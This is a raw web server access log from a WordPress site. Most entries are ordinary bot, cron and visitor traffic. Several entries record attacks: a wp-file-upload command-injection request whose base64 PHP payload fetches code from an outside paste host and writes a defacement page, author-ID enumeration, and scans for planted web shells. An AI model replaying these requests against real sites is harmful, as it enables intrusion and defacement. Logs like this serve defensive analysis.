198.54.114.83 - - [30/Mar/2025:15:30:14 -0400] "POST /wp-cron.php?doing_wp_cron=1743363013.7671830654144287109375 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
216.244.66.243 - - [30/Mar/2025:15:30:09 -0400] "GET /enjeux-de-paris-en-ligne-entre-excitation-et-prudence/ HTTP/1.1" 200 11561 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [30/Mar/2025:15:44:22 -0400] "POST /wp-cron.php?doing_wp_cron=1743363862.3725259304046630859375 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
216.244.66.243 - - [30/Mar/2025:15:44:18 -0400] "GET /hydraulic-hose-manufacturers/feed/ HTTP/1.1" 200 428 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
85.208.98.23 - - [30/Mar/2025:16:11:51 -0400] "GET /robots.txt HTTP/1.1" 200 132 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
198.54.114.83 - - [30/Mar/2025:16:38:06 -0400] "POST /wp-cron.php?doing_wp_cron=1743367086.6264359951019287109375 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
2804:443c:9000:0:4418:feff:fe2f:db53 - - [30/Mar/2025:16:38:04 -0400] "GET /wp-login.php HTTP/1.1" 302 0 "https://www.support.modix3d.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0"
46.8.16.76 - - [30/Mar/2025:16:50:48 -0400] "GET /building-true-team-spirit-for-peak-performance-in-sports-part-1/ HTTP/1.1" 200 13712 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:114.0) Gecko/20100101 Firefox/114.0"
196.251.88.242 - - [30/Mar/2025:17:11:41 -0400] "POST /wp-content/plugins/wp-file-upload/wfu_file_downloader.php?0=echo%20%60echo%20PD9waHAgZndyaXRlKGZvcGVuKCRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10uJy9oay5waHAnLCd3KycpLGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwczovL2dob3N0YmluLnNpdGUvb2NidmQvcmF3JykpOyBmd3JpdGUoZm9wZW4oJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2IweC5odG0nLCd3KycpLCdIYWNrZWQgYnkgUnhSJyk7Pz4=%20%7C%20base64%20--decode%60%3Ede.php;&file=p&ticket=H&handler=dboption&session_legacy=1&dboption_base=cookies&dboption_useold=0&wfu_cookie=wp_wpfileupload_9 HTTP/1.1" 403 1242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.88.242 - - [30/Mar/2025:17:12:17 -0400] "GET /wp-content/plugins/wp-file-upload/de.php HTTP/1.1" 403 1242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.88.242 - - [30/Mar/2025:17:12:30 -0400] "GET /hk.php HTTP/1.1" 403 1242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.88.242 - - [30/Mar/2025:17:15:08 -0400] "POST /wp-content/plugins/wp-file-upload/wfu_file_downloader.php?0=echo%20%60echo%20PD9waHAgZndyaXRlKGZvcGVuKCRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10uJy9oay5waHAnLCd3KycpLGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwczovL2dob3N0YmluLnNpdGUvb2NidmQvcmF3JykpOyBmd3JpdGUoZm9wZW4oJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2IweC5odG0nLCd3KycpLCdIYWNrZWQgYnkgUnhSJyk7Pz4=%20%7C%20base64%20--decode%60%3Ede.php;&file=p&ticket=H&handler=dboption&session_legacy=1&dboption_base=cookies&dboption_useold=0&wfu_cookie=wp_wpfileupload_9 HTTP/1.1" 403 1242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.88.242 - - [30/Mar/2025:17:15:21 -0400] "GET /wp-content/plugins/wp-file-upload/de.php HTTP/1.1" 403 1242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.88.242 - - [30/Mar/2025:17:15:34 -0400] "GET /hk.php HTTP/1.1" 403 1242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
194.38.23.16 - - [30/Mar/2025:17:56:04 -0400] "GET /plugins/html5-file-upload/html5fileupload.remove.php HTTP/1.1" 404 8273 "-" "ALittle Client"
216.244.66.243 - - [30/Mar/2025:18:05:47 -0400] "GET /robots.txt HTTP/1.1" 200 132 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.131.68.244 - - [30/Mar/2025:18:07:42 -0400] "GET /commercial-building-disclosure-has-arrived/ HTTP/1.1" 200 13303 "http://inversionesgoldie.com/commercial-building-disclosure-has-arrived/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0"
216.131.68.244 - - [30/Mar/2025:18:07:44 -0400] "POST /wp-comments-post.php HTTP/1.1" 302 0 "http://inversionesgoldie.com/commercial-building-disclosure-has-arrived/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0"
182.44.2.148 - - [30/Mar/2025:18:27:04 -0400] "GET / HTTP/1.1" 200 98560 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
216.244.66.243 - - [30/Mar/2025:18:29:42 -0400] "GET /5-ways-to-use-large-file-transfer/ HTTP/1.1" 200 12240 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.243 - - [30/Mar/2025:18:29:47 -0400] "GET /88971-fluticasone-110-mcg-inhaler-cost-33294/ HTTP/1.1" 404 8272 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [30/Mar/2025:18:34:51 -0400] "POST /wp-cron.php?doing_wp_cron=1743374090.8571701049804687500000 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
216.244.66.243 - - [30/Mar/2025:18:34:46 -0400] "GET /custom-athletic-socks/feed/ HTTP/1.1" 200 421 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [30/Mar/2025:18:42:52 -0400] "POST /wp-cron.php?doing_wp_cron=1743374571.9915869235992431640625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
93.123.109.101 - - [30/Mar/2025:18:42:48 -0400] "GET /code/npm/@ali/lzd-h5-utils-icon/1.0.8/index.js HTTP/1.1" 404 8271 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/121.0.0.0"
43.166.255.122 - - [30/Mar/2025:18:50:37 -0400] "GET / HTTP/1.1" 200 98560 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
84.247.50.194 - - [30/Mar/2025:18:52:44 -0400] "GET /commercial-building-disclosure-has-arrived/ HTTP/1.1" 200 13303 "http://inversionesgoldie.com/commercial-building-disclosure-has-arrived/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
198.54.114.83 - - [30/Mar/2025:18:52:47 -0400] "POST /wp-cron.php?doing_wp_cron=1743375167.2932620048522949218750 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
84.247.50.194 - - [30/Mar/2025:18:52:45 -0400] "POST /wp-comments-post.php HTTP/1.1" 302 0 "http://inversionesgoldie.com/commercial-building-disclosure-has-arrived/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
85.208.98.23 - - [30/Mar/2025:18:59:43 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
216.244.66.243 - - [30/Mar/2025:19:04:02 -0400] "GET /robots.txt HTTP/1.1" 200 132 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [30/Mar/2025:19:05:22 -0400] "POST /wp-cron.php?doing_wp_cron=1743375922.6419970989227294921875 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
182.43.76.198 - - [30/Mar/2025:19:05:22 -0400] "GET /wp-login.php HTTP/1.1" 302 0 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)"
182.43.76.198 - - [30/Mar/2025:19:05:26 -0400] "GET /?author=1 HTTP/1.1" 200 98560 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)"
182.43.76.198 - - [30/Mar/2025:19:05:27 -0400] "GET /?author=2 HTTP/1.1" 200 98560 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)"
182.43.76.198 - - [30/Mar/2025:19:05:28 -0400] "GET /?author=3 HTTP/1.1" 200 98560 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)"
182.43.76.198 - - [30/Mar/2025:19:05:28 -0400] "GET /?author=4 HTTP/1.1" 200 98560 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)"
182.43.76.198 - - [30/Mar/2025:19:05:29 -0400] "GET /?author=5 HTTP/1.1" 200 98560 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)"
182.43.76.198 - - [30/Mar/2025:19:05:31 -0400] "GET /?author=6 HTTP/1.1" 200 98560 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)"
182.43.76.198 - - [30/Mar/2025:19:05:32 -0400] "GET /?author=7 HTTP/1.1" 200 98560 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)"
182.43.76.198 - - [30/Mar/2025:19:05:32 -0400] "GET /?author=8 HTTP/1.1" 200 98560 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)"
182.43.76.198 - - [30/Mar/2025:19:05:33 -0400] "GET /?author=9 HTTP/1.1" 200 98560 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)"
182.43.76.198 - - [30/Mar/2025:19:05:34 -0400] "GET /?author=10 HTTP/1.1" 200 98560 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)"
182.43.76.198 - - [30/Mar/2025:19:05:34 -0400] "GET /?author=11 HTTP/1.1" 200 98560 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)"
182.43.76.198 - - [30/Mar/2025:19:05:35 -0400] "GET /?author=12 HTTP/1.1" 200 98560 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)"
182.43.76.198 - - [30/Mar/2025:19:05:36 -0400] "GET /?author=13 HTTP/1.1" 200 98560 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)"
182.43.76.198 - - [30/Mar/2025:19:05:36 -0400] "GET /?author=14 HTTP/1.1" 200 98560 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)"
182.43.76.198 - - [30/Mar/2025:19:05:37 -0400] "GET /?author=15 HTTP/1.1" 200 98560 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)"
182.43.76.198 - - [30/Mar/2025:19:05:38 -0400] "GET /?author=16 HTTP/1.1" 200 98560 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)"
182.43.76.198 - - [30/Mar/2025:19:05:38 -0400] "GET /?author=17 HTTP/1.1" 200 98560 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)"
182.43.76.198 - - [30/Mar/2025:19:05:39 -0400] "GET /?author=18 HTTP/1.1" 200 98560 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)"
182.43.76.198 - - [30/Mar/2025:19:05:40 -0400] "GET /?author=19 HTTP/1.1" 200 98560 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)"
182.43.76.198 - - [30/Mar/2025:19:05:40 -0400] "GET /?author=20 HTTP/1.1" 200 98560 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_161)"
216.244.66.243 - - [30/Mar/2025:19:45:29 -0400] "GET /cute-sandals-for-women/feed/ HTTP/1.1" 200 426 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.243 - - [30/Mar/2025:19:45:34 -0400] "GET /landal-danemark/feed/ HTTP/1.1" 200 418 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.243 - - [30/Mar/2025:19:45:38 -0400] "GET /senior-mutual-insurance/feed/ HTTP/1.1" 200 424 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.243 - - [30/Mar/2025:19:45:42 -0400] "GET /the-concept-of-beauty/feed/ HTTP/1.1" 200 422 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.243 - - [30/Mar/2025:19:56:02 -0400] "GET /robots.txt HTTP/1.1" 200 132 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.243 - - [30/Mar/2025:20:06:22 -0400] "GET /buy-real-tiktok-followers/ HTTP/1.1" 200 11686 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
41.140.4.245 - - [30/Mar/2025:20:09:18 -0400] "POST /wp-login.php HTTP/1.1" 302 0 "http://inversionesgoldie.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
93.123.109.101 - - [30/Mar/2025:20:25:46 -0400] "GET /lzdmod/site-nav-pc/5.2.38/assets/logo-bar/index.js HTTP/1.1" 404 8272 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/121.0.0.0"
198.54.114.83 - - [30/Mar/2025:20:27:45 -0400] "POST /wp-cron.php?doing_wp_cron=1743380865.1540238857269287109375 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
216.244.66.243 - - [30/Mar/2025:20:27:40 -0400] "GET /umzuge-buchholz/ HTTP/1.1" 200 11382 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.243 - - [30/Mar/2025:20:33:33 -0400] "GET /boat-rental-on-flathead-lake/ HTTP/1.1" 200 11878 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [30/Mar/2025:20:36:20 -0400] "POST /wp-cron.php?doing_wp_cron=1743381380.4803318977355957031250 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
216.244.66.243 - - [30/Mar/2025:20:36:16 -0400] "GET /data-recovery-software-and-specialists/ HTTP/1.1" 200 12683 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
217.114.43.197 - - [30/Mar/2025:20:40:06 -0400] "GET / HTTP/1.1" 200 98560 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
198.54.114.83 - - [30/Mar/2025:21:01:36 -0400] "POST /wp-cron.php?doing_wp_cron=1743382896.5286059379577636718750 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
41.140.4.245 - - [30/Mar/2025:21:01:34 -0400] "POST /wp-login.php HTTP/1.1" 302 0 "http://inversionesgoldie.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
198.54.114.83 - - [30/Mar/2025:21:09:56 -0400] "POST /wp-cron.php?doing_wp_cron=1743383396.7046449184417724609375 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
216.244.66.243 - - [30/Mar/2025:21:09:54 -0400] "GET /how-to-budget-for-dental-care/ HTTP/1.1" 200 13683 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [30/Mar/2025:21:33:01 -0400] "POST /wp-cron.php?doing_wp_cron=1743384780.8700149059295654296875 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
216.244.66.243 - - [30/Mar/2025:21:33:00 -0400] "GET /various-teeth-brightening-techniques/feed/ HTTP/1.1" 200 434 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
94.131.50.101 - - [30/Mar/2025:21:47:44 -0400] "GET /what-is-an-air-cooler/ HTTP/1.1" 200 12204 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1264.71"
94.131.50.101 - - [30/Mar/2025:21:47:46 -0400] "GET / HTTP/1.1" 200 98560 "http://inversionesgoldie.com/what-is-an-air-cooler/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1264.71"
216.244.66.243 - - [30/Mar/2025:21:53:25 -0400] "GET /robots.txt HTTP/1.1" 200 132 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [30/Mar/2025:22:02:16 -0400] "POST /wp-cron.php?doing_wp_cron=1743386536.5259699821472167968750 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
216.244.66.243 - - [30/Mar/2025:22:02:14 -0400] "GET /vita-glow-night-cream-review/ HTTP/1.1" 200 11628 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.243 - - [30/Mar/2025:22:09:09 -0400] "GET /best-cbd-uk/ HTTP/1.1" 200 12203 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.243 - - [30/Mar/2025:22:10:54 -0400] "GET /the-power-of-virality/ HTTP/1.1" 200 11627 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [30/Mar/2025:22:11:08 -0400] "POST /wp-cron.php?doing_wp_cron=1743387056.9043068885803222656250 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
216.244.66.243 - - [30/Mar/2025:22:13:56 -0400] "GET /air-conditioning HTTP/1.1" 301 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [30/Mar/2025:22:14:00 -0400] "POST /wp-cron.php?doing_wp_cron=1743387238.8199191093444824218750 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
176.67.86.247 - - [30/Mar/2025:22:19:23 -0400] "GET /commercial-building-disclosure-has-arrived/ HTTP/1.1" 200 13303 "http://inversionesgoldie.com/commercial-building-disclosure-has-arrived/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0"
176.67.86.247 - - [30/Mar/2025:22:19:24 -0400] "POST /wp-comments-post.php HTTP/1.1" 302 0 "http://inversionesgoldie.com/commercial-building-disclosure-has-arrived/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0"
173.245.207.242 - - [30/Mar/2025:22:44:23 -0400] "GET /commercial-building-disclosure-has-arrived/ HTTP/1.1" 200 13303 "http://inversionesgoldie.com/commercial-building-disclosure-has-arrived/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Avast/131.0.0.0"
198.54.114.83 - - [30/Mar/2025:22:44:37 -0400] "POST /wp-cron.php?doing_wp_cron=1743389076.8111109733581542968750 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
173.245.207.242 - - [30/Mar/2025:22:44:35 -0400] "POST /wp-comments-post.php HTTP/1.1" 302 0 "http://inversionesgoldie.com/commercial-building-disclosure-has-arrived/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Avast/131.0.0.0"
3.87.139.110 - - [30/Mar/2025:22:50:06 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36"
3.87.139.110 - - [30/Mar/2025:22:50:07 -0400] "GET / HTTP/1.1" 200 98560 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36"
185.220.101.51 - - [30/Mar/2025:22:51:47 -0400] "GET / HTTP/1.1" 200 98560 "inversionesgoldie.com" "Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.12"
185.220.100.255 - - [30/Mar/2025:22:52:46 -0400] "GET / HTTP/1.1" 200 98560 "http://inversionesgoldie.com" "Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.12"
198.12.252.11 - - [30/Mar/2025:22:56:36 -0400] "GET /commercial-building-disclosure-has-arrived/ HTTP/1.1" 200 13303 "http://inversionesgoldie.com/commercial-building-disclosure-has-arrived/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
198.12.252.11 - - [30/Mar/2025:22:56:42 -0400] "POST /wp-comments-post.php HTTP/1.1" 200 1168 "http://inversionesgoldie.com/commercial-building-disclosure-has-arrived/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
198.54.114.83 - - [30/Mar/2025:22:56:47 -0400] "POST /wp-cron.php?doing_wp_cron=1743389803.1852529048919677734375 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
172.200.236.244 - - [30/Mar/2025:23:13:33 -0400] "GET /lv.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:13:41 -0400] "GET /wp-22.php HTTP/1.1" 404 8271 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:13:41 -0400] "GET /wp-content/plugins/pwnd/pwnd.php HTTP/1.1" 404 8271 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:13:42 -0400] "GET /wp-content/plugins/pwnd-1/pwnd.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:13:43 -0400] "GET /wp-includes/Requests/about.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:13:43 -0400] "GET /wp-includes/style-engine/about.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:13:44 -0400] "GET /wp-includes/rest-api/about.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:13:44 -0400] "GET /wp-includes/SimplePie/about.php HTTP/1.1" 404 8273 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:13:45 -0400] "GET /wp-content/banners/about.php HTTP/1.1" 404 8273 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:13:46 -0400] "GET /wp-content/about.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:13:46 -0400] "GET /.well-known/about.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:13:47 -0400] "GET /wp-includes/Text/about.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:13:48 -0400] "GET /wp-includes/ID3/about.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:13:48 -0400] "GET /img/about.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:13:49 -0400] "GET /wp-content/languages/about.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:13:50 -0400] "GET /wp-includes/customize/about.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:13:50 -0400] "GET /wp-includes.bak/html-api/about.php HTTP/1.1" 404 8271 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:13:51 -0400] "GET /wp-includes/widgets/about.php HTTP/1.1" 404 8271 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:13:52 -0400] "GET /wp-includes/IXR/about.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:13:53 -0400] "GET /wp-admin/js/about.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:13:54 -0400] "GET /.well-known/pki-validation/about.php HTTP/1.1" 404 1251 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:13:54 -0400] "GET /wp-includes/pomo/about.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:13:55 -0400] "GET /wp-includes/block-patterns/about.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:13:56 -0400] "GET /wp-content/updraft/about.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:13:56 -0400] "GET /wp-content/upgrade-temp-backup/about.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:13:57 -0400] "GET /wp-content/themes/about.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:13:58 -0400] "GET /wp-admin/includes/about.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:13:58 -0400] "GET /images/about.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:13:59 -0400] "GET /wp-content/blogs.dir/about.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:13:59 -0400] "GET /wp-includes/images/about.php HTTP/1.1" 404 8273 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:00 -0400] "GET /wp-includes/about.php HTTP/1.1" 404 8273 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:00 -0400] "GET /cgi-bin/about.php HTTP/1.1" 404 8271 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:01 -0400] "GET /wp-content/gallery/about.php HTTP/1.1" 404 8271 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:01 -0400] "GET /wp-includes/blocks/about.php HTTP/1.1" 404 8271 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:02 -0400] "GET /wp-admin/css/about.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:03 -0400] "GET /wp-admin/images/about.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:03 -0400] "GET /.well-known/pki-validation/cloud.php HTTP/1.1" 404 1251 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:03 -0400] "GET /.well-known/acme-challenge/cloud.php HTTP/1.1" 404 8272 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:04 -0400] "GET /wp-admin/network/cloud.php HTTP/1.1" 404 8273 "-" "-"
172.200.236.244 - - [30/Mar/2025:23:14:05 -0400] "GET /cloud.php HTTP/1.1" 404 8273 "-" "-"
